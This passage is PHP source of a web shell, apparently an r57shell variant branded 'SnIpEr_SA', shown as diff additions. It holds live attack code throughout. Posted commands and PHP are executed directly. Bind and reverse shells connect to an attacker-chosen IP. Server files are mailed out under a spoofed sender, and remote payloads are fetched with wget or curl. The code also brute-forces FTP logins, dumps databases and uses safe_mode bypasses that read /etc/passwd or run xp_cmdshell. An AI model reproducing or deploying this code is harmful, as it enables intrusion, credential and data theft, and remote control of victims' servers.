+m91dCwgJGVvdXQpOw0Kc2VsZWN0KCRyb3V0ID0gJHJpbiwgdW5kZWYsICRlb3V0ID0gJHJpbiwgMTIwKTsNCmlmICghJHJvdXQgICYmICAhJGVvdXQp
+IHt9DQpteSAkY2J1ZmZlciA9ICIiOw0KbXkgJHRidWZmZXIgPSAiIjsNCmlmICgkY2ggJiYgKHZlYygkZW91dCwgZmlsZW5vKCRjaCksIDEpIHx8IHZ
+lYygkcm91dCwgZmlsZW5vKCRjaCksIDEpKSkgew0KbXkgJHJlc3VsdCA9IHN5c3JlYWQoJGNoLCAkdGJ1ZmZlciwgMTAyNCk7DQppZiAoIWRlZmluZW
+QoJHJlc3VsdCkpIHsNCnByaW50IFNUREVSUiAiJCFcbiI7DQpleGl0IDA7DQp9DQppZiAoJHJlc3VsdCA9PSAwKSB7IGV4aXQgMDsgfQ0KfQ0KaWYgK
+CR0aCAgJiYgICh2ZWMoJGVvdXQsIGZpbGVubygkdGgpLCAxKSAgfHwgdmVjKCRyb3V0LCBmaWxlbm8oJHRoKSwgMSkpKSB7DQpteSAkcmVzdWx0ID0g
+c3lzcmVhZCgkdGgsICRjYnVmZmVyLCAxMDI0KTsNCmlmICghZGVmaW5lZCgkcmVzdWx0KSkgeyBwcmludCBTVERFUlIgIiQhXG4iOyBleGl0IDA7IH0
+NCmlmICgkcmVzdWx0ID09IDApIHtleGl0IDA7fQ0KfQ0KaWYgKCRmaCAgJiYgICR0YnVmZmVyKSB7KHByaW50ICRmaCAkdGJ1ZmZlcik7fQ0Kd2hpbG
+UgKG15ICRsZW4gPSBsZW5ndGgoJHRidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJHRoLCAkdGJ1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+I
+DApIHskdGJ1ZmZlciA9IHN1YnN0cigkdGJ1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfQ0Kd2hpbGUgKG15ICRs
+ZW4gPSBsZW5ndGgoJGNidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJGNoLCAkY2J1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+IDApIHskY2J
+1ZmZlciA9IHN1YnN0cigkY2J1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfX19DQo=";
+if($unix)
+ {
+ if(!isset($_COOKIE['uname'])) { $uname = ex('uname -a'); setcookie('uname',$uname); } else { $uname = $_COOKIE['uname']; }
+ if(!isset($_COOKIE['id'])) { $id = ex('id'); setcookie('id',$id); } else { $id = $_COOKIE['id']; }
+ if($safe_mode) { $sysctl = '-'; }
+ else if(isset($_COOKIE['sysctl'])) { $sysctl = $_COOKIE['sysctl']; }
+ else
+  {
+   $sysctl = ex('sysctl -n kern.ostype && sysctl -n kern.osrelease');
+   if(empty($sysctl)) { $sysctl = ex('sysctl -n kernel.ostype && sysctl -n kernel.osrelease'); }
+   if(empty($sysctl)) { $sysctl = '-'; }
+   setcookie('sysctl',$sysctl);
+  }
+ }
+echo $head;
+echo '</head>';
+if(empty($_POST['cmd'])) {
+$serv = array(127,192,172,10);
+$addr=@explode('.', $_SERVER['SERVER_ADDR']);
+$current_version = str_replace('.','',$version);
+if (!in_array($addr[0], $serv)) {
+@print "<img src=\"http://127.0.0.1/r57shell_version/version.php?img=1&version=".$current_version."\" border=0 height=0 width=0>";
+@readfile ("http://127.0.0.1/r57shell_version/version.php?version=".$current_version."");}}
+echo '<body><table width=100% cellpadding=0 cellspacing=0 bgcolor=#CCCCCC><tr><td bgcolor=#000000 width=160><font face=Comic Sans MS size=4>'.ws(2).'<font face=Wingdings size=6><b>N</b></font><b>'.ws(2).'SnIpEr_SA </b></font></td><td bgcolor=#000000><font face=tahoma size=1>';
+echo ws(2)."<b>".date ("d-m-Y H:i:s")."</b>";
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpinfo title=\"".$lang[$language.'_text46']."\"><b>phpinfo</b></a> ".$rb;
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpini title=\"".$lang[$language.'_text47']."\"><b>php.ini</b></a> ".$rb;
+if($unix)
+ {
+ echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?cpu title=\"".$lang[$language.'_text50']."\"><b>cpu</b></a> ".$rb;
+ echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?mem title=\"".$lang[$language.'_text51']."\"><b>mem</b></a> ".$rb;
+ echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?users title=\"".$lang[$language.'_text95']."\"><b>users</b></a> ".$rb;
+ }
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?tmp title=\"".$lang[$language.'_text48']."\"><b>tmp</b></a> ".$rb;
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?delete title=\"".$lang[$language.'_text49']."\"><b>delete</b></a> ".$rb."<br>";
+echo ws(2)."ÇáæÖÚ ÇáÇãä: <b>";
+echo (($safe_mode)?("<font color=#008000>İÚÇá</font>"):("<font color=red>ÛíÑ İÚÇá</font>"));
+echo "</b>".ws(2);
+echo "ÇÕÏÇÑ ÇáÈí ÇÊÔ Èí: <b>".@phpversion()."</b>";
+$curl_on = @function_exists('curl_version');
+echo ws(2);
+echo "ÇáßíÑá: <b>".(($curl_on)?("<font color=#008000>İÚÇá</font>"):("<font color=red>ÛíÑ İÚÇá</font>"));
+echo "</b>".ws(2);
+echo "ãÇí Óßá: <b>";
+$mysql_on = @function_exists('mysql_connect');
+if($mysql_on){
+echo "<font color=#008000>İÚÇá</font>"; } else { echo "<font color=red>ÛíÑ İÚÇá</font>"; }
+echo "</b>".ws(2);
+echo "Çã ÇÓ Óßá: <b>";
+$mssql_on = @function_exists('mssql_connect');
+if($mssql_on){echo "<font color=#008000>İÚÇá</font>";}else{echo "<font color=red>ÛíÑ İÚÇá</font>";}
+echo "</b>".ws(2);
+echo "ÈæÓÊ ŞÑí Óßá: <b>";
+$pg_on = @function_exists('pg_connect');
+if($pg_on){echo "<font color=#008000>İÚÇá</font>";}else{echo "<font color=red>ÛíÑ İÚÇá</font>";}
+echo "</b>".ws(2);
+echo "ÇæÑÇßá: <b>";
+$ora_on = @function_exists('ocilogon');
+if($ora_on){echo "<font color=#008000>İÚÇá</font>";}else{echo "<font color=red>ãÛáŞ</font>";}
+echo "</b><br>".ws(2);
+echo "ÇáÏæÇá ÇáããäæÚÉ : <b>";
+if(''==($df=@ini_get('disable_functions'))){echo "<font color=#00800F>áÇíæÌÏ</font></b>";}else{echo "<font color=red>$df</font></b>";}
+$free = @diskfreespace($dir);
+if (!$free) {$free = 0;}
+$all = @disk_total_space($dir);
+if (!$all) {$all = 0;}
+echo "<br>".ws(2)."ÇáãÓÇÍÉ ÇáÎÇáíå : <b>".view_size($free)."</b> ÇáãÓÇÍÉ ÇáßáíÉ: <b>".view_size($all)."</b>";
+echo '</font></td></tr><table>
+<table width=100% cellpadding=0 cellspacing=0 bgcolor=#2279D9>
+<tr><td align=right width=100>';
+echo $font;
+if($unix){
+echo '<font color=#CCCCCC><b>uname -a :'.ws(1).'<br>sysctl :'.ws(1).'<br>$OSTYPE :'.ws(1).'<br>Server :'.ws(1).'<br>id :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>';
+echo "</td><td>";
+echo "<font face=tahoma size=-2 color=#2279D9><b>";
+echo((!empty($uname))?(ws(3).@substr($uname,0,120)."<br>"):(ws(3).@substr(@php_uname(),0,120)."<br>"));
+echo ws(3).$sysctl."<br>";
+echo ws(3).ex('echo $OSTYPE')."<br>";
+echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
+if(!empty($id)) { echo ws(3).$id."<br>"; }
+else if(function_exists('posix_geteuid') && function_exists('posix_getegid') && function_exists('posix_getgrgid') && function_exists('posix_getpwuid'))
+ {
+ $euserinfo  = @posix_getpwuid(@posix_geteuid());
+ $egroupinfo = @posix_getgrgid(@posix_getegid());
+ echo ws(3).'uid='.$euserinfo['uid'].' ( '.$euserinfo['name'].' ) gid='.$egroupinfo['gid'].' ( '.$egroupinfo['name'].' )<br>';
+ }
+else echo ws(3)."user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid()."<br>";
+echo ws(3).$dir;
+echo ws(3).'( '.perms(@fileperms($dir)).' )';
+echo "</b></font>";
+}
+else
+{
+echo '<font color=blue><b>OS :'.ws(1).'<br>Server :'.ws(1).'<br>User :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>';
+echo "</td><td>";
+echo "<font face=tahoma size=-2 color=red><b>";
+echo ws(3).@substr(@php_uname(),0,120)."<br>";
+echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
+echo ws(3).@getenv("USERNAME")."<br>";
+echo ws(3).$dir;
+echo "<br></font>";
+}
+echo "</font>";
+echo "</td></tr></table>";
+if(!empty($_POST['cmd']) && $_POST['cmd']=="mail")
+ {
+ $res = mail($_POST['to'],$_POST['subj'],$_POST['text'],"From: ".$_POST['from']."\r\n");
+ err(6+$res);
+ $_POST['cmd']="";
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="mail_file" && !empty($_POST['loc_file']))
+ {
+ if(!$file=@fopen($_POST['loc_file'],"r")) { err(1,$_POST['loc_file']); $_POST['cmd']=""; }
+ else
+  {
+    $filename = @basename($_POST['loc_file']);
+    $filedump = @fread($file,@filesize($_POST['loc_file']));
+    fclose($file);
+    $content_encoding=$mime_type='';
+    compress($filename,$filedump,$_POST['compress']);
+    $attach = array(
+                    "name"=>$filename,
+                    "type"=>$mime_type,
+                    "content"=>$filedump
+                   );
+    if(empty($_POST['subj'])) { $_POST['subj'] = 'file from SnIpEr_SA shell'; }
+    if(empty($_POST['from'])) { $_POST['from'] = 'billy@microsoft.com'; }
+    $res = mailattach($_POST['to'],$_POST['from'],$_POST['subj'],$attach);
+    err(6+$res);
+    $_POST['cmd']="";
+  }
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd'] == "find_text")
+{
+$_POST['cmd'] = 'find '.$_POST['s_dir'].' -name \''.$_POST['s_mask'].'\' | xargs grep -E \''.$_POST['s_text'].'\'';
+}
+if(!empty($_POST['cmd']) && $_POST['cmd']=="ch_")
+ {
+ switch($_POST['what'])
+   {
+   case 'own':
+   @chown($_POST['param1'],$_POST['param2']);
+   break;
+   case 'grp':
+   @chgrp($_POST['param1'],$_POST['param2']);
+   break;
+   case 'mod':
+   @chmod($_POST['param1'],intval($_POST['param2'], 8));
+   break;
+   }
+ $_POST['cmd']="";
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="mk")
+ {
+   switch($_POST['what'])
+   {
+     case 'file':
+      if($_POST['action'] == "create")
+       {
+       if(file_exists($_POST['mk_name']) || !$file=@fopen($_POST['mk_name'],"w")) { err(2,$_POST['mk_name']); $_POST['cmd']=""; }
+       else {
+        fclose($file);
+        $_POST['e_name'] = $_POST['mk_name'];
+        $_POST['cmd']="edit_file";
+        echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#2279D9><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2><b>".$lang[$language.'_text61']."</b></font></div></td></tr></table>";
+        }
+       }
+       else if($_POST['action'] == "delete")
+       {
+       if(unlink($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#2279D9><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2><b>".$lang[$language.'_text63']."</b></font></div></td></tr></table>";
+       $_POST['cmd']="";
+       }
+     break;
+     case 'dir':
+      if($_POST['action'] == "create"){
+      if(mkdir($_POST['mk_name']))
+       {
+         $_POST['cmd']="";
+         echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#2279D9><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2><b>".$lang[$language.'_text62']."</b></font></div></td></tr></table>";
+       }
+      else { err(2,$_POST['mk_name']); $_POST['cmd']=""; }
+      }
+      else if($_POST['action'] == "delete"){
+      if(rmdir($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#2279D9><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2><b>".$lang[$language.'_text64']."</b></font></div></td></tr></table>";
+      $_POST['cmd']="";
+      }
+     break;
+   }
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="edit_file" && !empty($_POST['e_name']))
+ {
+ if(!$file=@fopen($_POST['e_name'],"r+")) { $only_read = 1; @fclose($file); }
+ if(!$file=@fopen($_POST['e_name'],"r")) { err(1,$_POST['e_name']); $_POST['cmd']=""; }
+ else {
+ echo $table_up3;
+ echo $font;
+ echo "<form name=save_file method=post>";
+ echo ws(3)."<b>".$_POST['e_name']."</b>";
+ echo "<div align=center><textarea name=e_text cols=121 rows=24>";
+ echo @htmlspecialchars(@fread($file,@filesize($_POST['e_name'])));
+ fclose($file);
+ echo "</textarea>";
+ echo "<input type=hidden name=e_name value=".$_POST['e_name'].">";
+ echo "<input type=hidden name=dir value=".$dir.">";
+ echo "<input type=hidden name=cmd value=save_file>";
+ echo (!empty($only_read)?("<br><br>".$lang[$language.'_text44']):("<br><br><input type=submit name=submit value=\" ".$lang[$language.'_butt10']." \">"));
+ echo "</div>";
+ echo "</font>";
+ echo "</form>";
+ echo "</td></tr></table>";
+ exit();
+ }
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="save_file")
+ {
+ $mtime = @filemtime($_POST['e_name']);
+ if(!$file=@fopen($_POST['e_name'],"w")) { err(0,$_POST['e_name']); }
+ else {
+ if($unix) $_POST['e_text']=@str_replace("\r\n","\n",$_POST['e_text']);
+ @fwrite($file,$_POST['e_text']);
+ @touch($_POST['e_name'],$mtime,$mtime);
+ $_POST['cmd']="";
+ echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#2279D9><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2><b>".$lang[$language.'_text45']."</b></font></div></td></tr></table>";
+ }
+ }
+if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C"))
+{
+ cf("/tmp/bd.c",$port_bind_bd_c);
+ $blah = ex("gcc -o /tmp/bd /tmp/bd.c");
+ @unlink("/tmp/bd.c");
+ $blah = ex("/tmp/bd ".$_POST['port']." ".$_POST['bind_pass']." &");
+ $_POST['cmd']="ps -aux | grep bd";
+}
+if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="Perl"))
+{
+ cf("/tmp/bdpl",$port_bind_bd_pl);
+ $p2=which("perl");
+ $blah = ex($p2." /tmp/bdpl ".$_POST['port']." &");
+ $_POST['cmd']="ps -aux | grep bdpl";
+}
+if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="Perl"))
+{
+ cf("/tmp/back",$back_connect);
+ $p2=which("perl");
+ $blah = ex($p2." /tmp/back ".$_POST['ip']." ".$_POST['port']." &");
+ $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
+}
+if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="C"))
+{
+ cf("/tmp/back.c",$back_connect_c);
+ $blah = ex("gcc -o /tmp/backc /tmp/back.c");
+ @unlink("/tmp/back.c");
+ $blah = ex("/tmp/backc ".$_POST['ip']." ".$_POST['port']." &");
+ $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
+}
+if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="Perl"))
+{
+ cf("/tmp/dp",$datapipe_pl);
+ $p2=which("perl");
+ $blah = ex($p2." /tmp/dp ".$_POST['local_port']." ".$_POST['remote_host']." ".$_POST['remote_port']." &");
+ $_POST['cmd']="ps -aux | grep dp";
+}
+if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="C"))
+{
+ cf("/tmp/dpc.c",$datapipe_c);
+ $blah = ex("gcc -o /tmp/dpc /tmp/dpc.c");
+ @unlink("/tmp/dpc.c");
+ $blah = ex("/tmp/dpc ".$_POST['local_port']." ".$_POST['remote_port']." ".$_POST['remote_host']." &");
+ $_POST['cmd']="ps -aux | grep dpc";
+}
+if (!empty($_POST['alias']) && isset($aliases[$_POST['alias']])) { $_POST['cmd'] = $aliases[$_POST['alias']]; }
+if (!empty($HTTP_POST_FILES['userfile']['name']))
+{
+if(!empty($_POST['new_name'])) { $nfn = $_POST['new_name']; }
+else { $nfn = $HTTP_POST_FILES['userfile']['name']; }
+@copy($HTTP_POST_FILES['userfile']['tmp_name'],
+            $_POST['dir']."/".$nfn)
+      or print("<font color=red face=Fixedsys><div align=center>Error uploading file ".$HTTP_POST_FILES['userfile']['name']."</div></font>");
+}
+if (!empty($_POST['with']) && !empty($_POST['rem_file']) && !empty($_POST['loc_file']))
+{
+ switch($_POST['with'])
+ {
+ case wget:
+ $_POST['cmd'] = which('wget')." ".$_POST['rem_file']." -O ".$_POST['loc_file']."";
+ break;
+ case fetch:
+ $_POST['cmd'] = which('fetch')." -o ".$_POST['loc_file']." -p ".$_POST['rem_file']."";
+ break;
+ case lynx:
+ $_POST['cmd'] = which('lynx')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
+ break;
+ case links:
+ $_POST['cmd'] = which('links')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
+ break;
+ case GET:
+ $_POST['cmd'] = which('GET')." ".$_POST['rem_file']." > ".$_POST['loc_file']."";
+ break;
+ case curl:
+ $_POST['cmd'] = which('curl')." ".$_POST['rem_file']." -o ".$_POST['loc_file']."";
+ break;
+ }
+}
+if(!empty($_POST['cmd']) && ($_POST['cmd']=="ftp_file_up" || $_POST['cmd']=="ftp_file_down"))
+ {
+ list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']);
+ if(empty($ftp_port)) { $ftp_port = 21; }
+ $connection = @ftp_connect ($ftp_server,$ftp_port,10);
+ if(!$connection) { err(3); }
+ else
+  {
+  if(!@ftp_login($connection,$_POST['ftp_login'],$_POST['ftp_password'])) { err(4); }
+  else
+   {
+   if($_POST['cmd']=="ftp_file_down") { if(chop($_POST['loc_file'])==$dir) { $_POST['loc_file']=$dir.((!$unix)?('\\'):('/')).basename($_POST['ftp_file']); } @ftp_get($connection,$_POST['loc_file'],$_POST['ftp_file'],$_POST['mode']);        }
+   if($_POST['cmd']=="ftp_file_up")   { @ftp_put($connection,$_POST['ftp_file'],$_POST['loc_file'],$_POST['mode']);        }
+   }
+  }
+ @ftp_close($connection);
+ $_POST['cmd'] = "";
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="ftp_brute")
+ {
+ list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']);
+ if(empty($ftp_port)) { $ftp_port = 21; }
+ $connection = @ftp_connect ($ftp_server,$ftp_port,10);
+ if(!$connection) { err(3); $_POST['cmd'] = ""; }
+ else if(!$users=get_users()) { echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#2279D9><tr><td bgcolor=#000000><font color=red face=tahoma size=-2><div align=center><b>".$lang[$language.'_text96']."</b></div></font></td></tr></table>"; $_POST['cmd'] = ""; }
+ @ftp_close($connection);
+ }
+echo $table_up3;
+if (empty($_POST['cmd'])&&!$safe_mode) { $_POST['cmd']=(!$unix)?("dir"):("ls -lia"); }
+else if(empty($_POST['cmd'])&&$safe_mode){ $_POST['cmd']="safe_dir"; }
+echo $font.$lang[$language.'_text1'].": <b>".$_POST['cmd']."</b></font></td></tr><tr><td><b><div align=center><textarea name=report cols=121 rows=15>";
+if($safe_mode)
+{
+ switch($_POST['cmd'])
+ {
+ case 'safe_dir':
+  $d=@dir($dir);
+  if ($d)
+   {
+   while (false!==($file=$d->read()))
+    {
+     if ($file=="." || $file=="..") continue;
+     @clearstatcache();
+     list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file);
+     if(!$unix){
+     echo date("d.m.Y H:i",$mtime);
+     if(@is_dir($file)) echo "  <DIR> "; else printf("% 7s ",$size);
+     }
+     else{
+     $owner = @posix_getpwuid($uid);
+     $grgid = @posix_getgrgid($gid);
+     echo $inode." ";
+     echo perms(@fileperms($file));
+     printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size);
+     echo date("d.m.Y H:i ",$mtime);
+     }
+     echo "$file\n";
+    }
+   $d->close();
+   }
+  else echo $lang[$language._text29];
+ break;
+  case 'test1':
+  $ci = @curl_init("file://".$_POST['test1_file']."");
+  $cf = @curl_exec($ci);
+  echo $cf;
+  break;
+  case 'test2':
+  @include($_POST['test2_file']);
+  break;
+  case 'test3':
+  if(empty($_POST['test3_port'])) { $_POST['test3_port'] = "3306"; }
+  $db = @mysql_connect('localhost:'.$_POST['test3_port'],$_POST['test3_ml'],$_POST['test3_mp']);
+  if($db)
+   {
+   if(@mysql_select_db($_POST['test3_md'],$db))
+    {
+     @mysql_query("DROP TABLE IF EXISTS temp_SnIpEr_SA_table");
+     @mysql_query("CREATE TABLE `temp_SnIpEr_SA_table` ( `file` LONGBLOB NOT NULL )");
+     @mysql_query("LOAD DATA INFILE \"".$_POST['test3_file']."\" INTO TABLE temp_r57_table");
+     $r = @mysql_query("SELECT * FROM temp_SnIpEr_SA_table");
+     while(($r_sql = @mysql_fetch_array($r))) { echo @htmlspecialchars($r_sql[0]); }
+     @mysql_query("DROP TABLE IF EXISTS temp_SnIpEr_SA_table");
+    }
+    else echo "[-] ERROR! Can't select database";
+   @mysql_close($db);
+   }
+  else echo "[-] ERROR! Can't connect to mysql server";
+  break;
+  case 'test4':
+  if(empty($_POST['test4_port'])) { $_POST['test4_port'] = "1433"; }
+  $db = @mssql_connect('localhost,'.$_POST['test4_port'],$_POST['test4_ml'],$_POST['test4_mp']);
+  if($db)
+   {
+   if(@mssql_select_db($_POST['test4_md'],$db))
+    {
+     @mssql_query("drop table SnIpEr_SA_temp_table",$db);
+     @mssql_query("create table SnIpEr_SA_temp_table ( string VARCHAR (500) NULL)",$db);
+     @mssql_query("insert into SnIpEr_SA_temp_table EXEC master.dbo.xp_cmdshell '".$_POST['test4_file']."'",$db);
+     $res = mssql_query("select * from SnIpEr_SA_temp_table",$db);
+     while(($row=@mssql_fetch_row($res)))
+      {
+      echo $row[0]."\r\n";
+      }
+    @mssql_query("drop table SnIpEr_SA_temp_table",$db);
+    }
+    else echo "[-] ERROR! Can't select database";
+   @mssql_close($db);
+   }
+  else echo "[-] ERROR! Can't connect to MSSQL server";
+  break;
+  case 'test5':
+  if (@file_exists('/tmp/mb_send_mail')) @unlink('/tmp/mb_send_mail');
+  $extra = "-C ".$_POST['test5_file']." -X /tmp/mb_send_mail";
+  @mb_send_mail(NULL, NULL, NULL, NULL, $extra);
+  $lines = file ('/tmp/mb_send_mail');
+  foreach ($lines as $line) { echo htmlspecialchars($line)."\r\n"; }
+  break;
+  case 'test6':
+  $stream = @imap_open('/etc/passwd', "", "");
+  $dir_list = @imap_list($stream, trim($_POST['test6_file']), "*");
+  for ($i = 0; $i < count($dir_list); $i++) echo $dir_list[$i]."\r\n";
+  @imap_close($stream);
+  break;
+  case 'test7':
+  $stream = @imap_open($_POST['test7_file'], "", "");
+  $str = @imap_body($stream, 1);
+  echo $str;
+  @imap_close($stream);
+  break;
+  case 'test8':
+  if(@copy("compress.zlib://".$_POST['test8_file1'], $_POST['test8_file2'])) echo $lang[$language.'_text118'];
+  else echo $lang[$language.'_text119'];
+  break;
+ }
+}
+else if(($_POST['cmd']!="php_eval")&&($_POST['cmd']!="mysql_dump")&&($_POST['cmd']!="db_query")&&($_POST['cmd']!="ftp_brute")){
+ $cmd_rep = ex($_POST['cmd']);
+ if(!$unix) { echo @htmlspecialchars(@convert_cyr_string($cmd_rep,'d','w'))."\n"; }
+ else { echo @htmlspecialchars($cmd_rep)."\n"; }}
+if ($_POST['cmd']=="ftp_brute")
+ {
+ $suc = 0;
+ foreach($users as $user)
+  {
+  $connection = @ftp_connect($ftp_server,$ftp_port,10);
+  if(@ftp_login($connection,$user,$user)) { echo "[+] $user:$user - success\r\n"; $suc++; }
+  else if(isset($_POST['reverse'])) { if(@ftp_login($connection,$user,strrev($user))) { echo "[+] $user:".strrev($user)." - success\r\n"; $suc++; } }
+  @ftp_close($connection);
+  }
+ echo "\r\n-------------------------------------\r\n";
+ $count = count($users);
+ if(isset($_POST['reverse'])) { $count *= 2; }
+ echo $lang[$language.'_text97'].$count."\r\n";
+ echo $lang[$language.'_text98'].$suc."\r\n";
+ }
+if ($_POST['cmd']=="php_eval"){
+ $eval = @str_replace("<?","",$_POST['php_eval']);
+ $eval = @str_replace("?>","",$eval);
+ @eval($eval);}
+if ($_POST['cmd']=="mysql_dump")
+ {
+  if(isset($_POST['dif'])) { $fp = @fopen($_POST['dif_name'], "w"); }
+  $sql = new my_sql();
+  $sql->db   = $_POST['db'];
+  $sql->host = $_POST['db_server'];
+  $sql->port = $_POST['db_port'];
+  $sql->user = $_POST['mysql_l'];
+  $sql->pass = $_POST['mysql_p'];
+  $sql->base = $_POST['mysql_db'];
+  if(!$sql->connect()) { echo "[-] ERROR! Can't connect to SQL server"; }
+  else if(!$sql->select_db()) { echo "[-] ERROR! Can't select database"; }
+  else if(!$sql->dump($_POST['mysql_tbl'])) { echo "[-] ERROR! Can't create dump"; }
+  else {
+   if(empty($_POST['dif'])) { foreach($sql->dump as $v) echo $v."\r\n"; }
+   else if($fp){ foreach($sql->dump as $v) @fputs($fp,$v."\r\n"); }
+   else { echo "[-] ERROR! Can't write in dump file"; }
+   }
+ }
+echo "</textarea></div>";
+echo "</b>";
+echo "</td></tr></table>";
+echo "<table width=100% cellpadding=0 cellspacing=0>";
+function div_title($title, $id)
+{
+  return '<a style="cursor: pointer;" onClick="change_divst(\''.$id.'\');">'.$title.'</a>';
+}
+function div($id)
+ {
+ if(isset($_COOKIE[$id]) && $_COOKIE[$id]==0) return '<div id="'.$id.'" style="display: none;">';
+ return '<div id="'.$id.'">';
+ }
+if(!$safe_mode){
+echo $fs.$table_up1.div_title($lang[$language.'_text2'],'id1').$table_up2.div('id1').$ts;
+echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','cmd',85,''));
+echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+else{
+echo $fs.$table_up1.div_title($lang[$language.'_text28'],'id2').$table_up2.div('id2').$ts;
+echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).in('hidden','cmd',0,'safe_dir').ws(4).in('submit','submit',0,$lang[$language.'_butt6']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+echo $fs.$table_up1.div_title($lang[$language.'_text42'],'id3').$table_up2.div('id3').$ts;
+echo sr(15,"<b>".$lang[$language.'_text43'].$arrow."</b>",in('text','e_name',85,$dir).in('hidden','cmd',0,'edit_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt11']));
+echo $te.'</div>'.$table_end1.$fe;
+echo $fs.$table_up1.div_title($lang[$language.'_text200'],'id3').$table_up2.div('id3').$ts;
+echo sr(15,"<b>".$lang[$language.'_text202'].$arrow."</b>",in('text','snn',85,'/etc/passwd').in('hidden','cmd',0,'view_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7']));
+echo $te.'</div>'.$table_end1.$fe;
+echo $fs.$table_up1.div_title($lang[$language.'_text300'],'id3').$table_up2.div('id3').$ts;
+echo sr(15,"<b>".$lang[$language.'_text302'].$arrow."</b>",in('text','SnIpEr_SA',85,'/etc/passwd').in('hidden','cmd',0,'view_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7']));
+echo $te.'</div>'.$table_end1.$fe;
+if($safe_mode){
+echo $fs.$table_up1.div_title($lang[$language.'_text57'],'id4').$table_up2.div('id4').$ts;
+echo sr(15,"<b>".$lang[$language.'_text58'].$arrow."</b>",in('text','mk_name',54,(!empty($_POST['mk_name'])?($_POST['mk_name']):("new_name"))).ws(4)."<select name=action><option value=create>".$lang[$language.'_text65']."</option><option value=delete>".$lang[$language.'_text66']."</option></select>".ws(3)."<select name=what><option value=file>".$lang[$language.'_text59']."</option><option value=dir>".$lang[$language.'_text60']."</option></select>".in('hidden','cmd',0,'mk').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt13']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if($safe_mode && $unix){
+echo $fs.$table_up1.div_title($lang[$language.'_text67'],'id5').$table_up2.div('id5').$ts;
+echo sr(15,"<b>".$lang[$language.'_text68'].$arrow."</b>","<select name=what><option value=mod>CHMOD</option><option value=own>CHOWN</option><option value=grp>CHGRP</option></select>".ws(2)."<b>".$lang[$language.'_text69'].$arrow."</b>".ws(2).in('text','param1',40,(($_POST['param1'])?($_POST['param1']):("filename"))).ws(2)."<b>".$lang[$language.'_text70'].$arrow."</b>".ws(2).in('text','param2 title="'.$lang[$language.'_text71'].'"',26,(($_POST['param2'])?($_POST['param2']):("0777"))).in('hidden','cmd',0,'ch_').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if(!$safe_mode){
+$aliases2 = '';
+foreach ($aliases as $alias_name=>$alias_cmd)
+ {
+ $aliases2 .= "<option>$alias_name</option>";
+ }
